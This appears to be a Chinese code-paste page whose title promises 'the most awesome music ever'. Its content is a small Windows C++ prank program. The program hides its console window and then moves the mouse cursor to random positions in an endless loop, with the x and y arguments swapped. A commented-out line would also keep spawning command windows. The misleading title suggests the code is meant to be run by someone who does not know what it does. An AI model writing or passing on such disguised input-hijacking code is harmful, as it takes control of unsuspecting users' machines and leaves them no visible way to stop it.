[Plain Text] Re: 史上最屌的音乐 →→→→→进入此内容的聊天室

来自 华佳龙, 2024-03-15, 写在 Plain Text, 查看 116 次. 这张便签是回复 史上最屌的音乐 来自 华佳龙 - 返回
URL http://www.code666.cn/view/40d04cd9/diff
#include <bits/stdc++.h>
#include <windows.h>
using namespace std;
void HideWindow() {
        HWND hwnd;
        hwnd=FindWindow("ConsoleWindowClass",NULL);
        if(hwnd) ShowWindow(hwnd,SW_HIDE);
        return;
}
int main() {
        HideWindow();
        int x=GetSystemMetrics(SM_CXSCREEN);  
        int y=GetSystemMetrics(SM_CYSCREEN);
        for(;;)
        {
                        //system("start cmd");
                        //for(int i=1;i<=100;i++)
                        //{
                                        SetCursorPos(rand()%y,rand()%x);
                        //}
        }
 
        return 0;
}

回复 "Re: 史上最屌的音乐"

这儿你可以回复上面这条便签

captcha